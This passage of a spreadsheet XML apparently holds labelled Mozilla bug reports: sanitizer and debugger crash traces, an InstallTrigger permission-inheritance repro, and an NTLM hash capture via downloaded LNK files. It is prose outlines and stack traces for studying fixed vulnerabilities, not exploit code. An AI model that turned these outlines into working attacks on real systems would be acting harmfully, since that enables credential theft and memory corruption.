          <t>SEGV in SkBlitLCD16OpaqueRow_SSE2</t>
        </is>
      </c>
      <c r="D2884" t="inlineStr">
        <is>
          <t>2024-05-30 09:22:10 -0700</t>
        </is>
      </c>
      <c r="E2884" t="n">
        <v>1</v>
      </c>
      <c r="F2884" t="n">
        <v>1</v>
      </c>
      <c r="G2884" t="n">
        <v>3</v>
      </c>
      <c r="H2884" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2884" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2884" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K2884" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2884" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2884" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2884" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2884" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2884" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+]</t>
        </is>
      </c>
      <c r="Q2884" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2884" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2884" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2884" t="n">
        <v>1</v>
      </c>
      <c r="U2884" t="n">
        <v>0</v>
      </c>
      <c r="V2884" t="n">
        <v>18</v>
      </c>
      <c r="W2884" t="inlineStr">
        <is>
          <t>Created attachment 8796864
firefox-SEGV-20f-20f-20f-0f3-2e50-min.html
Tested on:
OS: Ubuntu 16.04.1 LTS
Firefox: ASAN-build moz_source_stamp: f713114b8c8d352b668b3e8052bc51ece4df34e0
prefs.js from https://github.com/MozillaSecurity/fuzzdata/blob/master/settings/firefox/prefs.js
ASAN-trace:
ASAN:DEADLYSIGNAL
=================================================================
==2203==ERROR: AddressSanitizer: SEGV on unknown address 0x11dfdd40f2ff (pc 0x7ffb1f2b6e47 bp 0x7fffa27f3960 sp 0x7fffa27f3930 T0)
    #0 0x7ffb1f2b6e46 in SkBlitLCD16OpaqueRow_SSE2(unsigned int*, unsigned short const*, unsigned int, int, unsigned int) /home/worker/workspace/build/src/gfx/skia/skia/src/opts/SkBlitRow_opts_SSE2.cpp:459:57
    #1 0x7ffb1f356e51 in D32_LCD16_Proc /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkBlitMask_D32.cpp:46:9
    #2 0x7ffb1f356e51 in SkBlitMask::BlitColor(SkPixmap const&amp;, SkMask const&amp;, SkIRect const&amp;, unsigned int) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkBlitMask_D32.cpp:67
    #3 0x7ffb1f14be95 in SkARGB32_Opaque_Blitter::blitMask(SkMask const&amp;, SkIRect const&amp;) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkBlitter_ARGB32.cpp:188:9
    #4 0x7ffb1f64ede2 in DrawOneGlyph::blitMask(SkMask const&amp;, SkIRect const&amp;) const /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1551:13
    #5 0x7ffb1f64e540 in DrawOneGlyph::operator()(SkGlyph const&amp;, SkPoint, SkPoint) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1511:17
    #6 0x7ffb1f6512dd in SkFindAndPlaceGlyph::GlyphFindAndPlaceFullPixel&lt;DrawOneGlyph&amp;, (SkPaint::Align)0, (SkFindAndPlaceGlyph::SelectKerning)0&gt;::findAndPositionGlyph(char const**, SkPoint, DrawOneGlyph&amp;) /home/w
orker/workspace/build/src/gfx/skia/skia/src/core/SkFindAndPlaceGlyph.h:504:17
    #7 0x7ffb1f6479bb in void SkFindAndPlaceGlyph::ProcessPosText&lt;DrawOneGlyph&amp;&gt;(SkPaint::TextEncoding, char const*, unsigned long, SkPoint, SkMatrix const&amp;, float const*, int, SkPaint::Align, SkGlyphCache*, DrawO
neGlyph&amp;) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkFindAndPlaceGlyph.h:685:9
    #8 0x7ffb1f646906 in SkDraw::drawPosText(char const*, unsigned long, float const*, int, SkPoint const&amp;, SkPaint const&amp;) const /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkDraw.cpp:1676:5
    #9 0x7ffb1f3351ba in SkBitmapDevice::drawPosText(SkDraw const&amp;, void const*, unsigned long, float const*, int, SkPoint const&amp;, SkPaint const&amp;) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkBitmapDe
vice.cpp:345:5
    #10 0x7ffb1f38c0b0 in SkCanvas::onDrawPosText(void const*, unsigned long, SkPoint const*, SkPaint const&amp;) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2576:9
    #11 0x7ffb1f38e33f in SkCanvas::drawPosText(void const*, unsigned long, SkPoint const*, SkPaint const&amp;) /home/worker/workspace/build/src/gfx/skia/skia/src/core/SkCanvas.cpp:2651:5
    #12 0x7ffb17965856 in mozilla::gfx::DrawTargetSkia::FillGlyphs(mozilla::gfx::ScaledFont*, mozilla::gfx::GlyphBuffer const&amp;, mozilla::gfx::Pattern const&amp;, mozilla::gfx::DrawOptions const&amp;, mozilla::gfx::GlyphRe
nderingOptions const*) /home/worker/workspace/build/src/gfx/2d/DrawTargetSkia.cpp:1328:3
    #13 0x7ffb18032bed in GlyphBufferAzure::Flush(bool) /home/worker/workspace/build/src/gfx/thebes/gfxFont.cpp:1666:21
    #14 0x7ffb17ffd9e3 in ~GlyphBufferAzure /home/worker/workspace/build/src/gfx/thebes/gfxFont.cpp:1569:9
    #15 0x7ffb17ffd9e3 in gfxFont::DrawGlyphs(gfxShapedText const*, unsigned int, unsigned int, gfxPoint*, TextRunDrawParams const&amp;, FontDrawParams const&amp;) /home/worker/workspace/build/src/gfx/thebes/gfxFont.cpp:1
968
    #16 0x7ffb1800156b in gfxFont::Draw(gfxTextRun const*, unsigned int, unsigned int, gfxPoint*, TextRunDrawParams const&amp;, unsigned short) /home/worker/workspace/build/src/gfx/thebes/gfxFont.cpp:2156:9
    #17 0x7ffb18070b4d in gfxTextRun::DrawGlyphs(gfxFont*, gfxTextRun::Range, gfxPoint*, gfxTextRun::PropertyProvider*, gfxTextRun::Range, TextRunDrawParams&amp;, unsigned short) const /home/worker/workspace/build/src
/gfx/thebes/gfxTextRun.cpp:413:5
    #18 0x7ffb18073617 in gfxTextRun::Draw(gfxTextRun::Range, gfxPoint, gfxTextRun::DrawParams const&amp;) const /home/worker/workspace/build/src/gfx/thebes/gfxTextRun.cpp:667:9
    #19 0x7ffb1cf2e581 in DrawTextRun(gfxTextRun const*, gfxPoint const&amp;, gfxTextRun::Range, nsTextFrame::DrawTextRunParams const&amp;) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:6835:7
    #20 0x7ffb1cf2da56 in nsTextFrame::DrawTextRun(gfxTextRun::Range, gfxPoint const&amp;, nsTextFrame::DrawTextRunParams const&amp;) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:6845:3
    #21 0x7ffb1cf231f8 in nsTextFrame::DrawText(gfxTextRun::Range, gfxPoint const&amp;, nsTextFrame::DrawTextParams const&amp;) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:7028:5
    #22 0x7ffb1cf16139 in nsTextFrame::PaintText(nsTextFrame::PaintTextParams const&amp;, nsCharClipDisplayItem const&amp;, float) /home/worker/workspace/build/src/layout/generic/nsTextFrame.cpp:6799:3
    #23 0x7ffb1d0967b2 in SVGTextFrame::PaintSVG(gfxContext&amp;, gfxMatrix const&amp;, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const*) /home/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:3691:9
    #24 0x7ffb1d095043 in nsDisplaySVGText::Paint(nsDisplayListBuilder*, nsRenderingContext*) /home/worker/workspace/build/src/layout/svg/SVGTextFrame.cpp:3122:23
.
.
.
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/worker/workspace/build/src/gfx/skia/skia/src/opts/SkBlitRow_opts_SSE2.cpp:459:57 in SkBlitLCD16OpaqueRow_SSE2(unsigned int*, unsigned short const*, unsigned int, int, unsigned int)
==2203==ABORTING</t>
        </is>
      </c>
      <c r="X2884" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2885">
      <c r="A2885" t="n">
        <v>1658214</v>
      </c>
      <c r="B2885" t="inlineStr">
        <is>
          <t>2020-08-09 12:59:00 -0700</t>
        </is>
      </c>
      <c r="C2885" t="inlineStr">
        <is>
          <t>InstallTrigger can take the principal from the wrong inner window when initialized</t>
        </is>
      </c>
      <c r="D2885" t="inlineStr">
        <is>
          <t>2024-05-30 10:17:46 -0700</t>
        </is>
      </c>
      <c r="E2885" t="n">
        <v>1</v>
      </c>
      <c r="F2885" t="n">
        <v>1</v>
      </c>
      <c r="G2885" t="n">
        <v>3</v>
      </c>
      <c r="H2885" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2885" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2885" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K2885" t="inlineStr">
        <is>
          <t>Firefox 81</t>
        </is>
      </c>
      <c r="L2885" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2885" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2885" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2885" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2885" t="inlineStr">
        <is>
          <t>[adv-main80+][adv-esr68.12+][adv-esr78.2+][sec-survey]</t>
        </is>
      </c>
      <c r="Q2885" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2885" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S2885" t="inlineStr">
        <is>
          <t>81 Branch</t>
        </is>
      </c>
      <c r="T2885" t="n">
        <v>1</v>
      </c>
      <c r="U2885" t="n">
        <v>0</v>
      </c>
      <c r="V2885" t="n">
        <v>21</v>
      </c>
      <c r="W2885" t="inlineStr">
        <is>
          <t>Created attachment 9169064
inheritPermissions-testcase-new.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Steps to reproduce:
I created a form, that first loads about:blank into a full new window.  I then used the onsubmit handler to load https://fpn.firefox.com/ into this window which has the extension install permission, while holding a reference to the eval function for that window.  Upon submitting the form I have scripted an install of ghostery.
Actual results:
The secondary prompt still displays, which asks a user for permissions to be allowed.  Currently this stops a full install of a webextension, but allows for one to attempt more exploitation by manipulating input into Extensions.jsm.
Expected results:
Holding a reference to the eval function of a window should not allow one to inherit permissions of the window that is loaded.  This allows all permissions to be inherited but proper defense in depth stops things like accessing video/microphone streams.
Storage APIs may still be able to be manipulated, as I have not had time to fully test this.  This could allow one to pollute the local storage of extensions, and persistent webworker pages.</t>
        </is>
      </c>
      <c r="X2885" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2886">
      <c r="A2886" t="n">
        <v>669228</v>
      </c>
      <c r="B2886" t="inlineStr">
        <is>
          <t>2011-07-04 15:56:07 -0700</t>
        </is>
      </c>
      <c r="C2886" t="inlineStr">
        <is>
          <t>Crash with InstallTrigger, mozRequestAnimationFrame, throwing proxy</t>
        </is>
      </c>
      <c r="D2886" t="inlineStr">
        <is>
          <t>2013-12-27 14:20:05 -0800</t>
        </is>
      </c>
      <c r="E2886" t="n">
        <v>1</v>
      </c>
      <c r="F2886" t="n">
        <v>1</v>
      </c>
      <c r="G2886" t="n">
        <v>3</v>
      </c>
      <c r="H2886" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2886" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2886" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2886" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2886" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2886" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2886" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2886" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2886" t="inlineStr">
        <is>
          <t>[sg:critical?][needs aurora landing for Fx7][qa-]</t>
        </is>
      </c>
      <c r="Q2886" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2886" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2886" t="inlineStr">
        <is>
          <t>mozilla8</t>
        </is>
      </c>
      <c r="T2886" t="n">
        <v>1</v>
      </c>
      <c r="U2886" t="n">
        <v>0</v>
      </c>
      <c r="V2886" t="n">
        <v>20</v>
      </c>
      <c r="W2886" t="inlineStr">
        <is>
          <t>Created attachment 543838
testcase (crashes Firefox when loaded)
###!!! ASSERTION: No scope has this global object!: 'OKIfNotInitialized', file /builds/slave/m-cen-osx64-dbg/build/js/src/xpconnect/src/xpcwrappednativescope.cpp, line 840
&gt;XPCWrappedNativeScope::FindInJSObjectScope [js/src/xpconnect/src/xpcwrappednativescope.cpp:841]
&gt;XPCWrappedNativeScope::FindInJSObjectScope [js/src/xpconnect/src/xpcprivate.h:1503]
&gt;GetContextFromObject [js/src/xpconnect/src/xpcwrappedjsclass.cpp:574]
&gt;nsXPCWrappedJSClass::CallMethod [js/src/xpconnect/src/xpcwrappedjsclass.cpp:1289]
&gt;nsXPCWrappedJS::CallMethod [js/src/xpconnect/src/xpcwrappedjs.cpp:585]
&gt;PrepareAndDispatch [xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_darwin.cpp:153]
Debug crash: [@ XPCWrappedNativeScope::GetContext | GetContextFromObject]
Opt crash: bp-be925f53-6a18-40b4-9829-a9a0a2110704
Security-sensitive for now because this involves a chrome-content boundary.</t>
        </is>
      </c>
      <c r="X2886" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2887">
      <c r="A2887" t="n">
        <v>1671382</v>
      </c>
      <c r="B2887" t="inlineStr">
        <is>
          <t>2020-10-15 05:23:37 -0700</t>
        </is>
      </c>
      <c r="C2887" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free [@ GetLifecycleProxy] through [@ mozilla::ClientWebGLContext::GetFrontBufferSnapshot] with READ of size 8</t>
        </is>
      </c>
      <c r="D2887" t="inlineStr">
        <is>
          <t>2024-05-30 10:19:59 -0700</t>
        </is>
      </c>
      <c r="E2887" t="n">
        <v>1</v>
      </c>
      <c r="F2887" t="n">
        <v>1</v>
      </c>
      <c r="G2887" t="n">
        <v>3</v>
      </c>
      <c r="H2887" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2887" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2887" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K2887" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2887" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2887" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2887" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2887" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2887" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main84+]</t>
        </is>
      </c>
      <c r="Q2887" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2887" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2887" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T2887" t="n">
        <v>1</v>
      </c>
      <c r="U2887" t="n">
        <v>0</v>
      </c>
      <c r="V2887" t="n">
        <v>18</v>
      </c>
      <c r="W2887" t="inlineStr">
        <is>
          <t>The attached crash information was submitted via the ASan Nightly Reporter on mozilla-central-asan-nightly revision 83.0a1-20201008094950-https://hg.mozilla.org/mozilla-central/rev/e88890094825db821835b2f173e1e16eae3f51af.
For detailed crash information, see attachment.
This was already reported on October 8, so if this is on file already somewhere else, please dup :)</t>
        </is>
      </c>
      <c r="X2887" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2888">
      <c r="A2888" t="n">
        <v>1773894</v>
      </c>
      <c r="B2888" t="inlineStr">
        <is>
          <t>2022-06-12 12:37:04 -0700</t>
        </is>
      </c>
      <c r="C2888" t="inlineStr">
        <is>
          <t>Capture NTLM hash via LNK file download on Windows</t>
        </is>
      </c>
      <c r="D2888" t="inlineStr">
        <is>
          <t>2024-05-30 10:57:10 -0700</t>
        </is>
      </c>
      <c r="E2888" t="n">
        <v>1</v>
      </c>
      <c r="F2888" t="n">
        <v>1</v>
      </c>
      <c r="G2888" t="n">
        <v>3</v>
      </c>
      <c r="H2888" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2888" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2888" t="inlineStr">
        <is>
          <t>Downloads API</t>
        </is>
      </c>
      <c r="K2888" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2888" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2888" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2888" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2888" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2888" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-main103+][adv-esr102.1+]</t>
        </is>
      </c>
      <c r="Q2888" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2888" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2888" t="inlineStr">
        <is>
          <t>104 Branch</t>
        </is>
      </c>
      <c r="T2888" t="n">
        <v>1</v>
      </c>
      <c r="U2888" t="n">
        <v>0</v>
      </c>
      <c r="V2888" t="n">
        <v>38</v>
      </c>
      <c r="W2888" t="inlineStr">
        <is>
          <t>I don't know if this can be considered as a bug but I think this could be a security issue on Windows.
It's possible to download .lnk files with FireFox without any restriction and, using the IconLocation property of the link file, it's possible to capture the NTLM hash.
I made a video (not listed on YouTube, nobody can see it): https://www.youtube.com/watch?v=Ml_jE-pwisI
In this video I try to explain and show you the problem.
I've tried to replicate this using a public IP address and it works.
Mozilla Firefox version: 101.0.1 (64-bit)
Hope it helps.</t>
        </is>
      </c>
      <c r="X2888" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2889">
      <c r="A2889" t="n">
        <v>857883</v>
      </c>
      <c r="B2889" t="inlineStr">
        <is>
          <t>2013-04-03 18:53:23 -0700</t>
        </is>
      </c>
      <c r="C2889" t="inlineStr">
        <is>
          <t>Crash with onreadystatechange and reload</t>
        </is>
      </c>
      <c r="D2889" t="inlineStr">
        <is>
          <t>2014-11-19 19:47:17 -0800</t>
        </is>
      </c>
      <c r="E2889" t="n">
        <v>1</v>
      </c>
      <c r="F2889" t="n">
        <v>1</v>
      </c>
      <c r="G2889" t="n">
        <v>3</v>
      </c>
      <c r="H2889" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2889" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2889" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K2889" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2889" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2889" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N2889" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2889" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2889" t="inlineStr">
        <is>
          <t>[adv-main22+][adv-esr1707+]</t>
        </is>
      </c>
      <c r="Q2889" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2889" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2889" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T2889" t="n">
        <v>1</v>
      </c>
      <c r="U2889" t="n">
        <v>0</v>
      </c>
      <c r="V2889" t="n">
        <v>35</v>
      </c>
      <c r="W2889" t="inlineStr">
        <is>
          <t>Created attachment 733151
testcase (requires an empty test.html)
Crashes with the following stack trace when trying to execute unmapped memory. Testcase is attached, requires an empty test.html in the same directory. The testcase is very timing dependent, it works almost every time from a file://. I had it reproducing remotely a couple of times after quite a few reloads.
Stack on windows:
0x7099e938
xul!nsRefPtr&lt;nsXULPrototypeDocument&gt;::nsRefPtr&lt;nsXULPrototypeDocument&gt;(class nsRefPtr&lt;nsXULPrototypeDocument&gt; * aSmartPtr = 0x70472e30)+0xe
xul!nsDocumentViewer::Stop(void)+0x61
xul!nsDocShell::Stop(unsigned int aStopFlags = 3)+0x3f
xul!nsDocShell::InternalLoad(class nsIURI * aURI = 0x081f2500, class nsIURI * aReferrer = 0x00000000, class nsISupports * aOwner = 0x06267080, unsigned int aFlags = 0, wchar_t * aWindowTarget = 0x00000000 "", char * aTypeHint = 0x706cb730 "", class nsAString_internal * aFileName = 0x706d73b4, class nsIInputStream * aPostData = 0x00000000, class nsIInputStream * aHeadersData = 0x00000000, unsigned int aLoadType = 2, class nsISHEntry * aSHEntry = 0x0803e150, bool aFirstParty = true, class nsIDocShell ** aDocShell = 0x00000000, class nsIRequest ** aRequest = 0x00000000)+0x76b
xul!nsDocShell::LoadHistoryEntry(class nsISHEntry * aEntry = 0x0803e150, unsigned int aLoadType = 2)+0x290
xul!nsDocShell::Reload(unsigned int aReloadFlags = 0)+0xf6
xul!nsLocation::Reload(bool aForceget = false)+0x39
xul!NS_InvokeByIndex(class nsISupports * that = 0x0adb2940, unsigned int methodIndex = 0x14, unsigned int paramCount = 1, struct nsXPTCVariant * params = 0x0013d4c8)+0x27
xul!XPC_WN_CallMethod(struct JSContext * cx = 0x07ef8e00, unsigned int argc = 0, class JS::Value * vp = 0x04d900c8)+0x739
xul!xpc::WrapperFactory::Rewrap(struct JSContext * cx = &lt;Memory access error&gt;, class JSObject * existing = &lt;Memory access error&gt;, class JSObject * obj = &lt;Memory access error&gt;, class JSObject * wrappedProto = &lt;Memory access error&gt;, class JSObject * parent = &lt;Memory access error&gt;, unsigned int flags = &lt;Memory access error&gt;)+0x2f3
mozjs!JSCompartment::wrap(struct JSContext * cx = 0x00000000, class JS::MutableHandle&lt;JS::Value&gt; vp = class JS::MutableHandle&lt;JS::Value&gt;, class JS::Handle&lt;JSObject *&gt; existingArg = class JS::Handle&lt;JSObject *&gt;)+0x2cc
0x56eb5a0
0xffffff86</t>
        </is>
      </c>
      <c r="X2889" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2890">
      <c r="A2890" t="n">
        <v>840082</v>
      </c>
      <c r="B2890" t="inlineStr">
        <is>
          <t>2013-02-11 07:53:15 -0800</t>
        </is>
      </c>
      <c r="C2890" t="inlineStr">
        <is>
          <t>[MMS][User Story] Image, audio and video format support</t>
        </is>
      </c>
      <c r="D2890" t="inlineStr">
        <is>
          <t>2014-02-25 22:12:06 -0800</t>
        </is>
      </c>
      <c r="E2890" t="n">
        <v>1</v>
      </c>
      <c r="F2890" t="n">
        <v>1</v>
      </c>
      <c r="G2890" t="n">
        <v>6</v>
      </c>
      <c r="H2890" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2890" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J2890" t="inlineStr">
        <is>
          <t>Gaia::SMS</t>
        </is>
      </c>
      <c r="K2890" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2890" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M2890" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N2890" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2890" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2890" t="inlineStr">
        <is>
          <t>[3/11~3/15]</t>
        </is>
      </c>
      <c r="Q2890" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2890" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2890" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2890" t="n">
        <v>1</v>
      </c>
      <c r="U2890" t="n">
        <v>0</v>
      </c>
      <c r="V2890" t="n">
        <v>14</v>
      </c>
      <c r="W2890" t="inlineStr">
        <is>
          <t>UCID: Messages-012
User Story:
As a user, I can send, receive, and view MMS messages with JPEG images, AMR-NB, H.263 &amp; AMR so that I can view content that is commonly exchanged via MMS.</t>
        </is>
      </c>
      <c r="X2890" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2891">
      <c r="A2891" t="n">
        <v>1355174</v>
      </c>
      <c r="B2891" t="inlineStr">
        <is>
          <t>2017-04-10 11:49:32 -0700</t>
        </is>
      </c>
      <c r="C2891" t="inlineStr">
        <is>
          <t>Graphite2: out of bounds read [@ graphite2::Silf::readGraphite]</t>
        </is>
      </c>
      <c r="D2891" t="inlineStr">
        <is>
          <t>2017-10-26 19:20:53 -0700</t>
        </is>
      </c>
      <c r="E2891" t="n">
        <v>1</v>
      </c>
      <c r="F2891" t="n">
        <v>1</v>
      </c>
      <c r="G2891" t="n">
        <v>3</v>
      </c>
      <c r="H2891" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2891" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2891" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K2891" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2891" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2891" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2891" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2891" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2891" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main54+][adv-esr52.2+]</t>
        </is>
      </c>
      <c r="Q2891" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2891" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2891" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T2891" t="n">
        <v>1</v>
      </c>
      <c r="U2891" t="n">
        <v>0</v>
      </c>
      <c r="V2891" t="n">
        <v>13</v>
      </c>
      <c r="W2891" t="inlineStr">
        <is>
          <t>Created attachment 8856630
test_case.ttf
Found with a 32bit build running gr2FontTest.
STR:
Run in gdb with a 32-bit debug build.
gdb --args ./g2fonttest test_case.ttf -auto -demand -noprint
Program received signal SIGSEGV, Segmentation fault.
be::_peek&lt;4&gt; (p=&lt;optimized out&gt;) at src/inc/Endian.h:50
50          return _peek&lt;S/2&gt;(p) &lt;&lt; (S/2)*8 | _peek&lt;S/2&gt;(p+S/2);
(gdb) bt
#0  be::_peek&lt;4&gt; (p=&lt;optimized out&gt;) at src/inc/Endian.h:50
#1  be::read&lt;unsigned int&gt; (p=&lt;optimized out&gt;)
    at src/inc/Endian.h:60
#2  graphite2::Silf::readGraphite (this=&lt;optimized out&gt;, silf_start=&lt;optimized out&gt;, 
    lSilf=&lt;optimized out&gt;, face=..., version=&lt;optimized out&gt;)
    at src/Silf.cpp:188
#3  0x080551d8 in graphite2::Face::readGraphite (this=&lt;optimized out&gt;, silf=...)
    at src/Face.cpp:149
#4  0x0804f27e in (anonymous namespace)::load_face (face=..., options=&lt;optimized out&gt;)
    at src/gr_face.cpp:59
#5  gr_make_face_with_ops (appFaceHandle=&lt;optimized out&gt;, ops=&lt;optimized out&gt;, 
    faceOptions=&lt;optimized out&gt;) at src/gr_face.cpp:89
#6  0x080502c2 in gr_make_file_face (filename=&lt;optimized out&gt;, faceOptions=4294967292)
    at src/gr_face.cpp:242
#7  0x0804c6eb in Parameters::testFileFont (this=0xffffcf08)
    at gr2fonttest/gr2FontTest.cpp:639
#8  0x0804d9ed in main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;)
    at gr2fonttest/gr2FontTest.cpp:798</t>
        </is>
      </c>
      <c r="X2891" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2892">
      <c r="A2892" t="n">
        <v>52940</v>
      </c>
      <c r="B2892" t="inlineStr">
        <is>
          <t>2000-09-16 14:38:19 -0700</t>
        </is>
      </c>
      <c r="C2892" t="inlineStr">
        <is>
          <t>Crash on exit</t>
        </is>
      </c>
      <c r="D2892" t="inlineStr">
